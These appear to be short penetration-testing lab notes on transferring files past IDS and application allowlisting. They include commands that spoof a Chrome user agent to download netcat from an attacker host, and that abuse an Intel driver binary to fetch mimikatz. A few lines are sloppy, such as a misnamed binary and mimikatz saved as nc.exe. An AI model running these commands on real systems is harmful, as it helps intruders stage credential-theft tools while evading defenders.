Every http/s request has a user agent and can be filtered/detected by IDS/IPS. if we use PowerShell / terminal.
User Agents can be changed to “look” normal
List all user agents on PowerShell:
PS C:\htb>[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl
Downloading file pretending to be a Chrome User Agent
Set up listener on attacking machine:
Momothechi@htb[/htb]$ nc -lvnp 80
Setting Chrome User Agent on compromised machine:
PS C:\htb> $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::ChromeDownloading the file on compromised machine:
PS C:\htb> Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe"
Appication whitelistening may prevent using PowerShell or Netcat aswell as command line logging may allert defenders.
Using already installed drivers binaries to transfer files. need to check LOLBIN/GTFOBins for binaries that may apply.
f.e.: fxDownloadWrapper.exe - intel driver - contains functionality to download config files periodically
PS C:\htb> GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe"